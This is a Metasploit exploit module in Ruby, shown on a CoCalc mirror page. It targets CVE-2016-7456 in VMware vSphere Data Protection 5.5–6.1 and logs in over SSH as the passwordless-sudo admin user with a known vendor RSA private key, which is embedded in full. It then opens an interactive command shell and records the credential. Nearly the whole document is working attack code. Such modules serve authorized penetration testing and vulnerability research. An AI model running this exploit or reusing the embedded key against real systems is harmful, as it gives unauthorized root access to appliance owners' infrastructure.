CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/linux/ssh/vmware_vdp_known_privkey.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
require 'net/ssh'

7
require 'net/ssh/command_stream'

8


9
class MetasploitModule < Msf::Exploit::Remote

10
  Rank = ExcellentRanking

11


12
  include Msf::Exploit::Remote::SSH

13
  include Msf::Auxiliary::Report

14


15
  def initialize(info = {})

16
    super(

17
      update_info(

18
        info,

19
        {

20
          'Name' => 'VMware VDP Known SSH Key',

21
          'Description' => %q{

22
            VMware vSphere Data Protection appliances 5.5.x through 6.1.x contain a known ssh private key for the local user admin who is a sudoer without password.

23
          },

24
          'Platform' => 'unix',

25
          'Arch' => ARCH_CMD,

26
          'Privileged' => true,

27
          'Targets' => [ [ 'Universal', {} ] ],

28
          'Payload' => {

29
            'Compat' => {

30
              'PayloadType' => 'cmd_interact',

31
              'ConnectionType' => 'find'

32
            }

33
          },

34
          'Author' => ['phroxvs'],

35
          'License' => MSF_LICENSE,

36
          'References' => [

37
            [ 'CVE', '2016-7456' ],

38
            [ 'URL', 'https://www.vmware.com/security/advisories/VMSA-2016-0024.html' ],

39
          ],

40
          'DisclosureDate' => '2016-12-20',

41
          'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },

42
          'DefaultTarget' => 0,

43
          'Notes' => {

44
            'Stability' => [CRASH_SAFE],

45
            'Reliability' => [REPEATABLE_SESSION],

46
            'SideEffects' => []

47
          }

48
        }

49
      )

50
    )

51


52
    register_options(

53
      [

54
        # Since we don't include Tcp, we have to register this manually

55
        Opt::RHOST(),

56
        Opt::RPORT(22)

57
      ], self.class

58
    )

59


60
    register_advanced_options(

61
      [

62
        OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]),

63
        OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30])

64
      ]

65
    )

66
  end

67


68
  # helper methods that normally come from Tcp

69
  def rhost

70
    datastore['RHOST']

71
  end

72


73
  def rport

74
    datastore['RPORT']

75
  end

76


77
  def do_login

78
    opt_hash = ssh_client_defaults.merge({

79
      auth_methods: ['publickey'],

80
      port: rport,

81
      key_data: [ key_data ]

82
    })

83
    opt_hash.merge!(verbose: :debug) if datastore['SSH_DEBUG']

84
    begin

85
      ssh_socket = nil

86
      ::Timeout.timeout(datastore['SSH_TIMEOUT']) do

87
        ssh_socket = Net::SSH.start(rhost, 'admin', opt_hash)

88
      end

89
    rescue Rex::ConnectionError

90
      return

91
    rescue Net::SSH::Disconnect, ::EOFError

92
      print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation"

93
      return

94
    rescue ::Timeout::Error

95
      print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"

96
      return

97
    rescue Net::SSH::AuthenticationFailed

98
      print_error "#{rhost}:#{rport} SSH - Failed authentication"

99
    rescue Net::SSH::Exception => e

100
      print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}"

101
      return

102
    end

103


104
    if ssh_socket

105


106
      # Create a new session from the socket, then dump it.

107
      conn = Net::SSH::CommandStream.new(ssh_socket)

108
      sockets.delete(ssh_socket.transport.socket)

109


110
      return conn

111
    else

112
      return false

113
    end

114
  end

115


116
  def exploit

117
    conn = do_login

118
    if conn

119
      print_good 'Successful login'

120
      service_data = {

121
        address: rhost,

122
        port: rport,

123
        protocol: 'tcp',

124
        service_name: 'ssh',

125
        workspace_id: myworkspace_id

126
      }

127
      credential_data = {

128
        username: 'admin',

129
        private_type: :ssh_key,

130
        private_data: key_data,

131
        origin_type: :service,

132
        module_fullname: fullname

133
      }.merge(service_data)

134


135
      core = create_credential(credential_data)

136
      login_data = {

137
        core: core,

138
        last_attempted: Time.now

139
      }.merge(service_data)

140


141
      create_credential_login(login_data)

142
      handler(conn.lsock)

143
    end

144
  end

145


146
  def key_data

147
    <<~EOF

148
      -----BEGIN RSA PRIVATE KEY-----

149
      MIICWQIBAAKBgQCx/XgSpdlvoy1fABui75RYQFTRGPdkHBolTNIAeA91aPfnAr2X

150
      /PuZR/DiHMCYcn6/8A5Jn75YOD3OL0mumJJR1uQ4pyhY+MSptiMYxhvDLIiRRo16

151
      9jewWCSH/7jqWH8NhImpVxt5SjWtKhQInTdPkG1dCj8oSn87bt8fKvLcVQIBIwKB

152
      gFuJq3dN+suzAWQOryCYeC1i6cqfICTbQKV39vjtScdajh8IuUbZ4Hq3SK7M9VW3

153
      Od8NvjR+Ch691qSNWRf2saWS5MHiaYGF3xWwZokbJWJWmxlQ+Di9QAyRkjDIuMCR

154
      Sj/vvCa6kWzZlSZWOyNbs38XkWoKXqVYwtnyXrINpZJTAkEA2p0ZrCKQTWBKt7aT

155
      Rvx/8xnoYu9hSXIG1k11ql0HZdRpmveuZe64Gl6oJtgBZMXNdvAds+gvGTVCSfBO

156
      c2ne0wJBANBt3t84oicWJpkzXnUBPOZdheKfAK6QO7weXiRmbILTJ5drPdu8pmxR

157
      c1uQJgYitaSNKglJmz2WNOoaPZz/7zcCQBj8Au8Z5Jsg8pinJsZIvippXGMUCx5W

158
      LKrHBiIZQqyNTeXTKd/DgsEvY6yq+NhRHsvDq5+IP+Wfr83vk+/u16MCQE1qozz3

159
      xzMW2yL10qB8zXoivLNCX1bH26xFyzIXaiH2qE4vJZrCabM0MilSzEtr+lMP3GnZ

160
      gs27cr1aNCRfD7UCQHOXGagsD/ijMGNcWPBQOY3foHzxozoBLGmysAmVz3vX6uyr

161
      Y7oq9O5vDxwpMOAZ9JYTFuzEoWWg16L6SnNVYU4=

162
      -----END RSA PRIVATE KEY-----

163
    EOF

164
  end

165
end

166


167